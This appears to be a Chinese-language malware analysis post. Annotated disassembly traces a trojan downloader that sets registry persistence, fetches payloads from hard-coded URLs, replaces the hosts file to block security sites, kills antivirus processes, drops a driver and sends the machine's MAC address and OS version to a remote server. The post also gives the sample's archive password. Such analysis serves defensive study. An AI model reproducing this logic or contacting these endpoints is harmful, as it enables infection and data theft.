00400C7C |. 8D85 FCFEFFFF lea eax, [local.65] ; |
00400C82 |. 68 70074000 push 00400770 ; |Prefix = "open"
00400C87 |. 50 push eax ; |Path
00400C88 |. FF15 20044000 call dword ptr [<&KERNEL32.GetTempFileNameA>>; \GetTempFileNameA
00400C8E |. 8D85 F8FDFFFF lea eax, [local.130]
00400C94 |. 56 push esi ; /BufSize => 104 (260.)
00400C95 |. 50 push eax ; |Buffer
00400C96 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
00400C9C |. 8D85 F8FDFFFF lea eax, [local.130]
00400CA2 |. 68 60074000 push 00400760 ; /StringToAdd = "\wininet.dll"
00400CA7 |. 50 push eax ; |ConcatString
00400CA8 |. FF15 44044000 call dword ptr [<&KERNEL32.lstrcatA>] ; \lstrcatA
00400CAE |. 8D85 FCFEFFFF lea eax, [local.65]
00400CB4 |. 6A 00 push 0 ; /FailIfExists = FALSE
00400CB6 |. 50 push eax ; |NewFileName = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope14F.tmp"
00400CB7 |. 8D85 F8FDFFFF lea eax, [local.130] ; |
00400CBD |. 50 push eax ; |ExistingFileName = "C:\WINDOWS\system32\wininet.dll"
00400CBE |. FF15 70044000 call dword ptr [<&KERNEL32.CopyFileA>] ; \CopyFileA
00400CC4 |. 8D85 FCFEFFFF lea eax, [local.65] ; 将%SystemRoot%\system32\wininet.dll复制到%TEMP%
00400CCA |. 50 push eax ; /FileName
00400CCB |. FF15 74044000 call dword ptr [<&KERNEL32.LoadLibraryA>] ; \LoadLibraryA
00400CD1 |. 8BF8 mov edi, eax
00400CD3 |. 85FF test edi, edi
00400CD5 |. 74 4A je short 00400D21 ; 下面获得网络相关函数地址
00400CD7 |. 8B35 78044000 mov esi, dword ptr [<&KERNEL32.GetProcAddres>; kernel32.GetProcAddress
00400CDD |. 68 50074000 push 00400750 ; /ProcNameOrOrdinal = "InternetOpenA"
00400CE2 |. 57 push edi ; |hModule
00400CE3 |. FFD6 call esi ; \GetProcAddress
Call 3
00401318 |. 50 push eax ; /\src = "scvhost.exe"
00401319 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
0040131F |. 50 push eax ; |dest = "C:\WINDOWS\system32\"
00401320 |. E8 7B0E0000 call <jmp.&MSVCRT.strcat> ; \strcat
00401325 |. 83C4 10 add esp, 10
00401328 |. 8D45 F0 lea eax, [local.4]
0040132B |. 50 push eax ; /pHandle
0040132C |. 8D85 B4FDFFFF lea eax, [local.147] ; |
00401332 |. 50 push eax ; |Subkey
00401333 |. 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00401338 |. FF15 10044000 call dword ptr [<&ADVAPI32.RegCreateKeyA>] ; \RegCreateKeyA
0040133E |. 5F pop edi
0040133F |. 5E pop esi
00401340 |. 85C0 test eax, eax
00401342 |. 75 28 jnz short 0040136C
00401344 |. 8D85 B8FEFFFF lea eax, [local.82]
0040134A |. 50 push eax ; / /s = "C:\WINDOWS\system32\scvhost.exe"
0040134B |. E8 060E0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401350 |. 59 pop ecx ; 写入启动项
00401351 |. 40 inc eax
00401352 |. 50 push eax ; /BufSize
00401353 |. 8D85 B8FEFFFF lea eax, [local.82] ; |
00401359 |. 50 push eax ; |Buffer
0040135A |. 6A 01 push 1 ; |ValueType = REG_SZ
0040135C |. 6A 00 push 0 ; |Reserved = 0
0040135E |. 68 28084000 push 00400828 ; |ValueName = "360Soft"
00401363 |. FF75 F0 push [local.4] ; |hKey
00401366 |. FF15 0C044000 call dword ptr [<&ADVAPI32.RegSetValueExA>] ; \RegSetValueExA
0040136C |> FF75 F0 push [local.4] ; /hKey
0040136F |. FF15 08044000 call dword ptr [<&ADVAPI32.RegCloseKey>] ; \RegCloseKey
Call 4
00401377 /$ B8 35224000 mov eax, 00402235
0040137C |. E8 6F0E0000 call 004021F0
00401381 |. 81EC 58070000 sub esp, 758
00401387 |. 53 push ebx
00401388 |. 56 push esi
00401389 |. BE FF000000 mov esi, 0FF
0040138E |. 33DB xor ebx, ebx
00401390 |. 56 push esi ; /n => FF (255.)
00401391 |. 8D85 2CFDFFFF lea eax, [local.181] ; |
00401397 |. 53 push ebx ; |c => 00
00401398 |. 50 push eax ; |s
00401399 |. 895D E4 mov [local.7], ebx ; |
0040139C |. 895D DC mov [local.9], ebx ; |
0040139F |. 895D EC mov [local.5], ebx ; |
004013A2 |. 895D E8 mov [local.6], ebx ; |
004013A5 |. 895D E0 mov [local.8], ebx ; |
004013A8 |. E8 B50D0000 call <jmp.&MSVCRT.memset> ; \memset
004013AD |. 56 push esi ; /n
004013AE |. 8D85 9CF9FFFF lea eax, [local.409] ; |
004013B4 |. 53 push ebx ; |c
004013B5 |. 50 push eax ; |s
004013B6 |. E8 A70D0000 call <jmp.&MSVCRT.memset> ; \memset
004013BB |. 56 push esi ; /n
004013BC |. 8D85 9CFAFFFF lea eax, [local.345] ; |
004013C2 |. 53 push ebx ; |c
004013C3 |. 50 push eax ; |s
004013C4 |. E8 990D0000 call <jmp.&MSVCRT.memset> ; \memset
004013C9 |. 56 push esi ; /n
004013CA |. 8D85 9CF8FFFF lea eax, [local.473] ; |
004013D0 |. 53 push ebx ; |c
004013D1 |. 50 push eax ; |s
004013D2 |. E8 8B0D0000 call <jmp.&MSVCRT.memset> ; \memset
004013D7 |. 68 90010000 push 190 ; /n = 190 (400.)
004013DC |. 8D85 9CFBFFFF lea eax, [local.281] ; |
004013E2 |. 53 push ebx ; |c
004013E3 |. 50 push eax ; |s
004013E4 |. E8 790D0000 call <jmp.&MSVCRT.memset> ; \memset
004013E9 |. 8D85 2CFDFFFF lea eax, [local.181]
004013EF |. 68 68054000 push 00400568 ; /src = "H7CX26h`Ez[aUpvgNT6X2{SToTrRoISXIasuW62gqDOhJjeWVfoeWCCC"
004013F4 |. 50 push eax ; |dest
004013F5 |. E8 6E0D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004013FA |. 83C4 44 add esp, 44
004013FD |. 8D85 9CF9FFFF lea eax, [local.409]
00401403 |. 50 push eax
00401404 |. 8D85 2CFDFFFF lea eax, [local.181]
0040140A |. 50 push eax ; /s
0040140B |. E8 460D0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401410 |. 59 pop ecx
00401411 |. 50 push eax
00401412 |. 8D85 2CFDFFFF lea eax, [local.181]
00401418 |. 50 push eax
00401419 |. E8 15F7FFFF call <解密函数>
0040141E |. 8D85 9CFAFFFF lea eax, [local.345]
00401424 |. 50 push eax
00401425 |. 8D85 9CF9FFFF lea eax, [local.409]
0040142B |. 50 push eax
0040142C |. E8 5DF5FFFF call 0040098E ; 0012F81C 0012FA40 ASCII "NB2ODo6X8iwyiy2OHT3izbIdR+aMlxaMFx0PjgAA"
00401431 |. 8D85 9CF8FFFF lea eax, [local.473]
00401437 |. 50 push eax
00401438 |. 8D85 9CFAFFFF lea eax, [local.345]
0040143E |. 50 push eax
0040143F |. E8 F7F5FFFF call 00400A3B ; 字符处理出http://ad.ittz.net:72/ad.txt
00401444 |. 8D85 9CF8FFFF lea eax, [local.473]
0040144A |. 50 push eax ; /src
0040144B |. 8D85 9CFBFFFF lea eax, [local.281] ; |
00401451 |. 50 push eax ; |dest
00401452 |. E8 110D0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401457 |. 8D85 9CFBFFFF lea eax, [local.281]
0040145D |. 50 push eax ; /s
0040145E |. E8 F30C0000 call <jmp.&MSVCRT.strlen> ; \strlen
00401463 |. 83C4 28 add esp, 28
00401466 |. 85C0 test eax, eax
00401468 |. 77 07 ja short 00401471
0040146A |. 33C0 xor eax, eax
0040146C |. E9 DD010000 jmp 0040164E
00401471 |> 8B35 4C044000 mov esi, dword ptr [<&KERNEL32.CreateThread>>; kernel32.CreateThread
00401477 |. 57 push edi
00401478 |. BF A11B4000 mov edi, 00401BA1
0040147D |> 8D85 2CFEFFFF /lea eax, [local.117]
00401483 |. 50 |push eax ; /Buffer
00401484 |. 68 04010000 |push 104 ; |BufSize = 104 (260.)
00401489 |. FF15 24044000 |call dword ptr [<&KERNEL32.GetTempPathA>] ; \GetTempPathA
0040148F |. 8D85 2CFEFFFF |lea eax, [local.117]
00401495 |. 50 |push eax ; /TempName
00401496 |. 53 |push ebx ; |Unique
00401497 |. 8D85 2CFEFFFF |lea eax, [local.117] ; |
0040149D |. 68 70074000 |push 00400770 ; |Prefix = "open"
004014A2 |. 50 |push eax ; |Path = "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\"
004014A3 |. FF15 20044000 |call dword ptr [<&KERNEL32.GetTempFileNameA>; \GetTempFileNameA
004014A9 |> 8D85 2CFEFFFF |/lea eax, [local.117]
004014AF |. 50 ||push eax
004014B0 |. 8D85 9CFBFFFF ||lea eax, [local.281] ; 0012F830 0012FDD0 ASCII "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\ope153.tmp"
004014B6 |. 50 ||push eax ; 0012F82C 0012FB40 ASCII "http://ad.ittz.net:72/ad.txt"
004014B7 |. E8 6BF8FFFF ||call <下载文件>
004014BC |. 59 ||pop ecx
004014BD |. 83F8 01 ||cmp eax, 1
004014C0 |. 59 ||pop ecx
004014C1 |. 74 0D ||je short 004014D0
004014C3 |. 68 88130000 ||push 1388 ; /Timeout = 5000. ms
004014C8 |. FF15 80044000 ||call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
......下面还有一个线程,
00401549 |> \8D4D C0 ||lea ecx, [local.16]
0040154C |. 51 ||push ecx
0040154D |. 53 ||push ebx
0040154E |. 50 ||push eax
0040154F |. 68 5C164000 ||push 0040165C 线程 5
00401554 |. 53 ||push ebx
00401555 |. 53 ||push ebx
00401556 |. FFD6 ||call esi ; kernel32.CreateThread
00401558 |. 68 C0D40100 ||push 1D4C0 ; /Timeout = 120000. ms
0040155D |. 50 ||push eax ; |hObject
0040155E |. FF15 48044000 ||call dword ptr [<&KERNEL32.WaitForSingleOb>; \WaitForSingleObject
线程 5主要作用下载ad.txt列表里面的病毒木马运行
线程1 隐藏窗口
00400EF1 . 56 push esi
00400EF2 > 68 C0074000 push 004007C0 ; /Title = "Windows 文件保护"
00400EF7 . 68 B8074000 push 004007B8 ; |Class = "#32770"
00400EFC . FF15 3C054000 call dword ptr [<&USER32.FindWindowA>] ; \FindWindowA
00400F02 . 8BF0 mov esi, eax ; 创建线程,循环查找名为"#32770"的窗口
00400F04 . 85F6 test esi, esi
00400F06 . 74 27 je short 00400F2F
00400F08 . 6A F0 push -10 ; /Index = GWL_STYLE
00400F0A . 56 push esi ; |hWnd
00400F0B . FF15 38054000 call dword ptr [<&USER32.GetWindowLongA>] ; \GetWindowLongA
00400F11 . 0D 00000010 or eax, 10000000
00400F16 . 75 17 jnz short 00400F2F
00400F18 . 6A 00 push 0
00400F1A . 68 A4074000 push 004007A4
00400F1F . E8 BDFBFFFF call 00400AE1
00400F24 . 59 pop ecx
00400F25 . 59 pop ecx
00400F26 . 6A 00 push 0 ; /ShowState = SW_HIDE
00400F28 . 56 push esi ; |hWnd
00400F29 . FF15 44054000 call dword ptr [<&USER32.ShowWindow>] ; \ShowWindow
00400F2F > 6A 32 push 32 ; /Timeout = 50. ms
00400F31 . FF15 80044000 call dword ptr [<&KERNEL32.Sleep>] ; \Sleep
00400F37 .^ EB B9 jmp short 00400EF2
线程2
004011FC |. 68 CC054000 push 004005CC ; /src = "http://ad.ittz.net:72/hosts.txt"
00401201 |. 50 push eax ; |dest
00401202 |. E8 610F0000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401207 |. 83C4 20 add esp, 20
0040120A |. 8D85 ECFDFFFF lea eax, [local.133]
00401210 |. 68 1C084000 push 0040081C ; /String2 = "http://host"
00401215 |. 50 push eax ; |String1
00401216 |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
0040121C |. 85C0 test eax, eax
0040121E |. 74 43 je short 00401263
00401220 |. 8D85 ECFEFFFF lea eax, [local.69]
00401226 |. 56 push esi ; /BufSize
00401227 |. 50 push eax ; |Buffer
00401228 |. FF15 1C044000 call dword ptr [<&KERNEL32.GetSystemDirector>; \GetSystemDirectoryA
0040122E |. 8D45 EC lea eax, [local.5]
00401231 |. 50 push eax ; /src
00401232 |. 8D85 ECFEFFFF lea eax, [local.69] ; |
00401238 |. 50 push eax ; |dest
00401239 |. E8 620F0000 call <jmp.&MSVCRT.strcat> ; \strcat
0040123E |. 8D85 ECFEFFFF lea eax, [local.69]
00401244 |. 50 push eax
00401245 |. 8D85 ECFDFFFF lea eax, [local.133]
0040124B |. 50 push eax ; "http://ad.ittz.**net:72/hosts.txt"
0040124C |. E8 D6FAFFFF call <下载文件> ; 从指定网址下载文档替换%SystemRoot%\system32\drivers\etc\hosts文件,用以屏蔽大量安全软件网址
00401251 |. 83C4 10 add esp, 10
00401254 |. 8D85 ECFEFFFF lea eax, [local.69]
0040125A |. 6A 01 push 1 ; /FileAttributes = READONLY
0040125C |. 50 push eax ; |FileName
0040125D |. FF15 5C044000 call dword ptr [<&KERNEL32.SetFileAttributes>; \SetFileAttributesA
00401263 |> 33C0 xor eax, eax
00401265 |. 5E pop esi
00401266 |. C9 leave
00401267 \. C3 retn
线程3 连接指定网站,并将用户系统版本网卡MAC地址等信息发送到该网站数据库中。
00400FFF /. 55 push ebp ;
00401000 |. 8BEC mov ebp, esp
00401002 |. 81EC 10030000 sub esp, 310
00401008 |. 53 push ebx
00401009 |. 56 push esi
0040100A |. BE FF000000 mov esi, 0FF
0040100F |. 33DB xor ebx, ebx
00401011 |. 56 push esi ; /n => FF (255.)
00401012 |. 8D85 F0FDFFFF lea eax, [local.132] ; |
00401018 |. 53 push ebx ; |c => 00
00401019 |. 50 push eax ; |s
0040101A |. E8 43110000 call <jmp.&MSVCRT.memset> ; \memset
0040101F |. 56 push esi ; /n
00401020 |. 8D85 F0FCFFFF lea eax, [local.196] ; |
00401026 |. 53 push ebx ; |c
00401027 |. 50 push eax ; |s
00401028 |. E8 35110000 call <jmp.&MSVCRT.memset> ; \memset
0040102D |. 8D85 F0FDFFFF lea eax, [local.132]
00401033 |. 68 26064000 push 00400626 ; /src = "http://Count.shxyfc.com:88/Count.asp"
00401038 |. 50 push eax ; |dest
00401039 |. E8 2A110000 call <jmp.&MSVCRT.strcpy> ; \strcpy
0040103E |. 83C4 20 add esp, 20
00401041 |. 8D85 F0FDFFFF lea eax, [local.132]
00401047 |. 68 0C084000 push 0040080C ; /String2 = "http://count"
0040104C |. 50 push eax ; |String1
0040104D |. FF15 58044000 call dword ptr [<&KERNEL32.lstrcmpiA>] ; \lstrcmpiA
00401053 |. 85C0 test eax, eax
00401055 |. 0F84 1C010000 je 00401177
0040105B |. E8 AEFDFFFF call 00400E0E
00401060 |. 8D85 F0FCFFFF lea eax, [local.196]
00401066 |. 68 A4064000 push 004006A4 ; /src = "730070000000"
0040106B |. 50 push eax ; |dest
0040106C |. E8 F7100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
00401071 |. 59 pop ecx
00401072 |. 59 pop ecx
00401073 |. 53 push ebx
00401074 |. 53 push ebx
00401075 |. 53 push ebx
00401076 |. 53 push ebx
00401077 |. 68 04084000 push 00400804 ; ASCII "baidu"
0040107C |. FF15 30234000 call dword ptr [402330] ; ope14F.InternetOpenA
00401082 |. 3BC3 cmp eax, ebx
00401084 |. 8945 FC mov [local.1], eax
00401087 |. 0F84 EA000000 je 00401177
0040108D |. 57 push edi
0040108E |. 6A 40 push 40
00401090 |. 59 pop ecx
00401091 |. 33C0 xor eax, eax
00401093 |. 8DBD F1FEFFFF lea edi, dword ptr [ebp-10F]
00401099 |. 889D F0FEFFFF mov byte ptr [ebp-110], bl
0040109F |. F3:AB rep stos dword ptr es:[edi]
004010A1 |. 66:AB stos word ptr es:[edi]
004010A3 |. AA stos byte ptr es:[edi]
004010A4 |. BE FC074000 mov esi, 004007FC ; ASCII "?mac="
004010A9 |. 8D7D F4 lea edi, [local.3]
004010AC |. 8D85 F0FDFFFF lea eax, [local.132]
004010B2 |. A5 movs dword ptr es:[edi], dword ptr [esi]
004010B3 |. 50 push eax ; /src
004010B4 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010BA |. 50 push eax ; |dest
004010BB |. 66:A5 movs word ptr es:[edi], word ptr [esi] ; |
004010BD |. E8 A6100000 call <jmp.&MSVCRT.strcpy> ; \strcpy
004010C2 |. 8D45 F4 lea eax, [local.3]
004010C5 |. 50 push eax ; //src = "?mac="
004010C6 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010CC |. 50 push eax ; |dest
004010CD |. E8 CE100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010D2 |. 8D85 F0FCFFFF lea eax, [local.196]
004010D8 |. 50 push eax ; /src
004010D9 |. 8D85 F0FEFFFF lea eax, [local.68] ; |
004010DF |. 50 push eax ; |dest
004010E0 |. E8 BB100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010E5 |. 8D85 F0FEFFFF lea eax, [local.68]
004010EB |. 68 F4074000 push 004007F4 ; /src = "&ver="
004010F0 |. 50 push eax ; |dest
004010F1 |. E8 AA100000 call <jmp.&MSVCRT.strcat> ; \strcat
004010F6 |. 8D85 F0FEFFFF lea eax, [local.68]
004010FC |. 68 80064000 push 00400680 ; /src = "FM01|2011-08-25"
00401101 |. 50 push eax ; |dest
00401102 |. E8 99100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401107 |. 8D85 F0FEFFFF lea eax, [local.68]
0040110D |. 68 EC074000 push 004007EC ; /src = "&os="
00401112 |. 50 push eax ; |dest
00401113 |. E8 88100000 call <jmp.&MSVCRT.strcat> ; \strcat
00401118 |. E8 A5FEFFFF call 00400FC2 ; \GetVersionExA
0040111D |. 50 push eax ; /src
0040111E |. 8D85 F0FEFFFF lea eax, [local.68] ; |
00401124 |. 50 push eax ; |dest
00401125 |. E8 76100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040112A |. 8D85 F0FEFFFF lea eax, [local.68]
00401130 |. 68 E4074000 push 004007E4 ; /src = "&dtime="
00401135 |. 50 push eax ; |dest
00401136 |. E8 65100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040113B |. 83C4 40 add esp, 40
0040113E |. 8D85 F0FEFFFF lea eax, [local.68]
00401144 |. 68 94064000 push 00400694 ; /src = "2011-8-2"
00401149 |. 50 push eax ; |dest
0040114A |. E8 51100000 call <jmp.&MSVCRT.strcat> ; \strcat
0040114F |. 59 pop ecx
00401150 |. 8D85 F0FEFFFF lea eax, [local.68]
00401156 |. 59 pop ecx
00401157 |. 53 push ebx
00401158 |. 68 00000080 push 80000000
0040115D |. 53 push ebx
0040115E |. 53 push ebx
0040115F |. 50 push eax
00401160 |. FF75 FC push [local.1] ; 01D6FC84 01D6FEA4 ASCII "http://Count.shxyfc.com:88/Count.asp?mac=730070000000&ver=FM01|2011-08-25&os=&dtime=2011-8-2"
00401163 |. FF15 44234000 call dword ptr [402344] ; ope14F.InternetOpenUrlA 发送信息了
00401169 |. 85C0 test eax, eax
0040116B |. 5F pop edi
0040116C |. 75 09 jnz short 00401177
0040116E |. FF75 FC push [local.1]
00401171 |. FF15 48234000 call dword ptr [402348] ; ope14F.InternetCloseHandle
00401177 |> 5E pop esi
00401178 |. 33C0 xor eax, eax
0040117A |. 5B pop ebx
0040117B |. C9 leave
0040117C \. C3 retn
驱动文件参考这个帖子 http://bbs.pediy.com/showthread.php?t=90248
.text:00012178
.text:00012178 loc_12178: ; CODE XREF: start+32j
.text:00012178 mov DestinationString.MaximumLength, bx
.text:0001217F mov DestinationString.Length, bx
.text:00012186
.text:00012186 loc_12186: ; CODE XREF: start+40j
.text:00012186 mov esi, [ebp+DriverObject]
.text:00012189 mov edi, ds:RtlInitUnicodeString
.text:0001218F mov eax, offset sub_104CC
.text:00012194 mov [esi+38h], eax
.text:00012197 mov [esi+40h], eax
.text:0001219A push offset SourceString ; SourceString
.text:0001219F lea eax, [ebp+DestinationString]
.text:000121A2 push eax ; DestinationString
.text:000121A3 mov dword ptr [esi+70h], offset sub_11C60
.text:000121AA call edi ; RtlInitUnicodeString
.text:000121AC lea eax, [ebp+DeviceObject]
.text:000121AF push eax ; DeviceObject
.text:000121B0 push ebx ; Exclusive
.text:000121B1 push 100h ; DeviceCharacteristics
.text:000121B6 push 22h ; DeviceType
.text:000121B8 lea eax, [ebp+DestinationString]
.text:000121BB push eax ; DeviceName
.text:000121BC push 208h ; DeviceExtensionSize
.text:000121C1 push esi ; DriverObject
.text:000121C2 call ds:IoCreateDevice
.text:000121C8 mov esi, eax
.text:000121CA cmp esi, ebx
.text:000121CC jl short loc_121F6
.text:000121CE push offset word_1210E ; SourceString
.text:000121D3 lea eax, [ebp+SymbolicLinkName]
.text:000121D6 push eax ; DestinationString
.text:000121D7 call edi ; RtlInitUnicodeString
.text:000121D9 lea eax, [ebp+DestinationString]
.text:000121DC push eax ; DeviceName
.text:000121DD lea eax, [ebp+SymbolicLinkName]
.text:000121E0 push eax ; SymbolicLinkName
.text:000121E1 call ds:IoCreateSymbolicLink
.text:000121E7 mov esi, eax
.text:000121E9 cmp esi, ebx
.text:000121EB jge short loc_12209
.text:000121ED push [ebp+DeviceObject] ; DeviceObject
.text:000121F0 call ds:IoDeleteDevice
.text:000121F6
.text:000121F6 loc_121F6: ; CODE XREF: start+96j
.text:000121F6 mov eax, DestinationString.Buffer
.text:000121FB cmp eax, ebx
.text:000121FD jz short loc_12242
.text:000121FF push ebx ; Tag
.text:00012200 push eax ; P
.text:00012201 call ds:ExFreePoolWithTag
.text:00012207 jmp short loc_12242
大体流程分析了完了,有兴趣的同学可以下载了分析。
解压密码virus
1、创建一个互斥体
2、停止ekrn服务,结束ekrn.exe,egui.exe进程。
3、释放动态库文件 "C:\WINDOWS\system32\44810500.dll",结束大量安全软件进程,劫持安全软件。
4、调用GetTickCount函数,根据开机时间生成一个EXE文件到WINDOWS目录(我的机器为:C:\WINDOWS\45757859.exe),45757859.exe是一个木马下载者
5、释放驱动文件pcidump.sys,创建服务启动驱动,修改gm.dls和explorer.exe,删除驱动文件
备注:分别创建 44810500.dll、pcidump.sys、45757859.exe主要文件
主体分析:
00402230 . 81EC 680B0000 sub esp, 0B68 ; (Initial CPU selection)
00402236 . 53 push ebx
00402237 . 55 push ebp
00402238 . 56 push esi
00402239 . 57 push edi
0040223A . B9 3F000000 mov ecx, 3F
0040223F . 33C0 xor eax, eax
00402241 . 8DBC24 74050000 lea edi, dword ptr [esp+574]
00402248 . 68 E0134000 push 004013E0 ; /TGmae...
0040224D . F3:AB rep stos dword ptr es:[edi] ; |
0040224F . 66:AB stos word ptr es:[edi] ; |
00402251 . AA stos byte ptr es:[edi] ; |
00402252 . B9 3F000000 mov ecx, 3F ; |
00402257 . 33C0 xor eax, eax ; |
00402259 . 8DBC24 78070000 lea edi, dword ptr [esp+778] ; |
00402260 . B3 5C mov bl, 5C ; |
00402262 . F3:AB rep stos dword ptr es:[edi] ; |
00402264 . 66:AB stos word ptr es:[edi] ; |
00402266 . AA stos byte ptr es:[edi] ; |
00402267 . B9 3F000000 mov ecx, 3F ; |
0040226C . 33C0 xor eax, eax ; |
0040226E . 8DBC24 78060000 lea edi, dword ptr [esp+678] ; |
00402275 . 6A 00 push 0 ; |InitialOwner = FALSE
00402277 . F3:AB rep stos dword ptr es:[edi] ; |
00402279 . 66:AB stos word ptr es:[edi] ; |
0040227B . AA stos byte ptr es:[edi] ; |
0040227C . B9 3F000000 mov ecx, 3F ; |
00402281 . 33C0 xor eax, eax ; |
00402283 . 8D7C24 78 lea edi, dword ptr [esp+78] ; |
00402287 . 6A 00 push 0 ; |pSecurity = NULL
00402289 . F3:AB rep stos dword ptr es:[edi] ; |
0040228B . 66:AB stos word ptr es:[edi] ; |
0040228D . 885C24 24 mov byte ptr [esp+24], bl ; |输入\Explorer.EXE
00402291 . C64424 25 45 mov byte ptr [esp+25], 45 ; |
00402296 . C64424 26 78 mov byte ptr [esp+26], 78 ; |
0040229B . C64424 27 70 mov byte ptr [esp+27], 70 ; |
004022A0 . C64424 28 6C mov byte ptr [esp+28], 6C ; |
004022A5 . C64424 29 6F mov byte ptr [esp+29], 6F ; |
004022AA . C64424 2A 72 mov byte ptr [esp+2A], 72 ; |
004022AF . C64424 2B 65 mov byte ptr [esp+2B], 65 ; |
004022B4 . C64424 2C 72 mov byte ptr [esp+2C], 72 ; |
004022B9 . C64424 2D 2E mov byte ptr [esp+2D], 2E ; |
004022BE . C64424 2E 45 mov byte ptr [esp+2E], 45 ; |
004022C3 . C64424 2F 58 mov byte ptr [esp+2F], 58 ; |
004022C8 . C64424 30 45 mov byte ptr [esp+30], 45 ; |
004022CD . C64424 31 00 mov byte ptr [esp+31], 0 ; |
004022D2 . AA stos byte ptr es:[edi] ; |
004022D3 . FF15 84104000 call dword ptr [401084] ; \CreateMutexA 创建一个TGmae的互斥体,防止多次运行
004022D9 . FF15 80104000 call dword ptr [401080] ; ntdll.RtlGetLastWin32Error
004022DF . 3D B7000000 cmp eax, 0B7
004022E4 . 75 08 jnz short 004022EE
004022E6 . 6A 00 push 0 ; /ExitCode = 0
004022E8 . FF15 54104000 call dword ptr [401054] ; \ExitProcess
004022EE > 8B35 7C104000 mov esi, dword ptr [40107C] ; kernel32.GetWindowsDirectoryA
004022F4 . 8D8424 74060000 lea eax, dword ptr [esp+674]
004022FB . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402300 . 50 push eax ; |Buffer
00402301 . FFD6 call esi ; \GetWindowsDirectoryA
00402303 . 8D8C24 74050000 lea ecx, dword ptr [esp+574]
0040230A . 68 FF000000 push 0FF ; /BufSize = FF (255.)
0040230F . 51 push ecx ; |Buffer
00402310 . FFD6 call esi ; \GetWindowsDirectoryA
00402312 . 8B35 94104000 mov esi, dword ptr [401094] ; kernel32.lstrcatA
00402318 . 8D5424 18 lea edx, dword ptr [esp+18]
0040231C . 8D8424 74050000 lea eax, dword ptr [esp+574]
00402323 . 52 push edx ; /StringToAdd
00402324 . 50 push eax ; |ConcatString
00402325 . FFD6 call esi ; \lstrcatA
00402327 . 8D8C24 74070000 lea ecx, dword ptr [esp+774] ; 连接字符串C:\WINDOWS\Explorer.EXE
0040232E . 68 FF000000 push 0FF ; /BufSize = FF (255.)
00402333 . 51 push ecx ; |Buffer
00402334 . 885C24 4C mov byte ptr [esp+4C], bl ; |
00402338 . C64424 4D 74 mov byte ptr [esp+4D], 74 ; |
0040233D . C64424 4E 65 mov byte ptr [esp+4E], 65 ; |
00402342 . C64424 4F 6D mov byte ptr [esp+4F], 6D ; |
00402347 . C64424 50 70 mov byte ptr [esp+50], 70 ; |
0040234C . 885C24 51 mov byte ptr [esp+51], bl ; |
00402350 . C64424 52 45 mov byte ptr [esp+52], 45 ; |
00402355 . C64424 53 78 mov byte ptr [esp+53], 78 ; |
0040235A . C64424 54 70 mov byte ptr [esp+54], 70 ; |
0040235F . C64424 55 6C mov byte ptr [esp+55], 6C ; |
00402364 . C64424 56 6F mov byte ptr [esp+56], 6F ; |
00402369 . C64424 57 72 mov byte ptr [esp+57], 72 ; |
0040236E . C64424 58 65 mov byte ptr [esp+58], 65 ; |
00402373 . C64424 59 72 mov byte ptr [esp+59], 72 ; |
00402378 . C64424 5A 2E mov byte ptr [esp+5A], 2E ; |
0040237D . C64424 5B 65 mov byte ptr [esp+5B], 65 ; |
00402382 . C64424 5C 78 mov byte ptr [esp+5C], 78 ; |
00402387 . C64424 5D 65 mov byte ptr [esp+5D], 65 ; |
0040238C . C64424 5E 00 mov byte ptr [esp+5E], 0 ; |
00402391 . FF15 90104000 call dword ptr [401090] ; \GetSystemDirectoryA
00402397 . 8D5424 70 lea edx, dword ptr [esp+70]
0040239B . 68 FF000000 push 0FF ; /BufSize = FF (255.)
004023A0 . 52 push edx ; |PathBuffer
004023A1 . 6A 00 push 0 ; |hModule = NULL
004023A3 . 885C24 40 mov byte ptr [esp+40], bl ; |输入\drivers\gm.dls
004023A7 . C64424 41 64 mov byte ptr [esp+41], 64 ; |
004023AC . C64424 42 72 mov byte ptr [esp+42], 72 ; |
004023B1 . C64424 43 69 mov byte ptr [esp+43], 69 ; |
004023B6 . C64424 44 76 mov byte ptr [esp+44], 76 ; |
004023BB . C64424 45 65 mov byte ptr [esp+45], 65 ; |
004023C0 . C64424 46 72 mov byte ptr [esp+46], 72 ; |
004023C5 . C64424 47 73 mov byte ptr [esp+47], 73 ; |
004023CA . 885C24 48 mov byte ptr [esp+48], bl ; |
004023CE . C64424 49 67 mov byte ptr [esp+49], 67 ; |
004023D3 . C64424 4A 6D mov byte ptr [esp+4A], 6D ; |
004023D8 . C64424 4B 2E mov byte ptr [esp+4B], 2E ; |
004023DD . C64424 4C 64 mov byte ptr [esp+4C], 64 ; |
004023E2 . C64424 4D 6C mov byte ptr [esp+4D], 6C ; |
004023E7 . C64424 4E 73 mov byte ptr [esp+4E], 73 ; |
004023EC . C64424 4F 00 mov byte ptr [esp+4F], 0 ; |
004023F1 . FF15 58104000 call dword ptr [401058] ; \GetModuleFileNameA
004023F7 . 8D8424 74050000 lea eax, dword ptr [esp+574] ; C:\trojan\trojan\412489_fm01.exe
004023FE . 8D4C24 70 lea ecx, dword ptr [esp+70]
00402402 . 50 push eax ; /0012F448 0012F9C0 \String2 = "C:\WINDOWS\Explorer.EXE"
00402403 . 51 push ecx ; |0012F444 0012F4BC |String1 = "C:\trojan\trojan\412489_fm01.exe"
00402404 . FF15 48104000 call dword ptr [401048] ; \lstrcmpiA
0040240A . 85C0 test eax, eax
